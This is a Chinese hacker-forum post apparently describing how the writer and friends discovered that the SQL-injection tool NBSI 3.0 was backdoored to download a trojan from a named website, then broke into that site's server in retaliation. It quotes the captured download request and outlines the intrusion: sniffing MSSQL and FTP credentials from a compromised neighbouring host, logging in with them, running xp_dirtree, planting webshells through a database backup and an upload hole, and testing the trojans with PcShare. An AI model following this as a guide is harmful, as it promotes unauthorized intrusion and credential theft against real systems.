首先,BS一下放后门的人,事实上是谁捆了,我们几个人也已经该知道,也不想说了,他的人品大家都知道....

　　工具可以在黑鹰基地下载(http://www3.3800cc.com/Soft/gjgj/11115.html华北资源在线).下面的文章记录昨天我们(小刀,茶茶,小莫)反攻的全过程.

　　刚拿到工具那天我就开始抓包分析工具哪些变化,例如加了getwebshell功能.

　　抓包的时候,发现突然多了一条路径,向一个网站下载一个.exe文件,当时没在意,之后突然发现自己向外的

　　数据包很大,这个时候茶茶在群里说nbsi3.0有后门,于是几个人开始渗透过来.

　　数据包:

　　GET/mp3/win.exeHTTP/1.1

　　Accept:*/*

　　UA-CPU:x86

　　Accept-Encoding:gzip,deflate

　　User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.2;SV1;.NETCLR1.1.4322)

　　Host:www.6xwg.com

　　Connection:Keep-Alive

　　www.6xwg.com也就是nbsi后门转向的站点.

　　我们几个人分工,两个对网段进行扫描,另外两个对主机进行旁入.

　　旁入拿shell很容易就拿下,过程略,后来又在同网段下拿了台sa的肉鸡,

　　tracertwww.6xwg.com

　　直接返回IP说明可以嗅.

　　茶茶和刀刀两个负责嗅,而我继续旁入,服务器的权限配置BT,想通过旁注很难.

　　这时茶茶嗅到一堆dbo权限的mssql账号,还有一堆ftp账号和密码.

　　www.6xwg.com又开了1433,直接本地连接.

　　execmaster..xp_dirtree"d:/",1,1

　　从旁入的信息和分析得到路径,接着备份一个shell,但是备出来老出现%>无法毕合,又换备php小马.

　　但php小马又出现超时,再翻了翻他的路径,找到一个旧的动易程序,有上传漏洞,刚刚好上去.

　　接着到那个mp3目录下,发现了一堆网马,为了测试,我们配了一个pcshare,然后我们运行nbsi3.0

　　刀刀告诉我,我们几个全部上线了,之后,我通知了xiaolu,还有一些好友,还包括中标的人(查后门中标的人).接着做了这个证明动画.

　　好了,不多说了,具体怎么想大家自己去想吧,这里再次BS捆后门的人.

　　请使用过此工具的人注意,最好重做系统吧,不知道那个pc有没有做过免杀!!! 【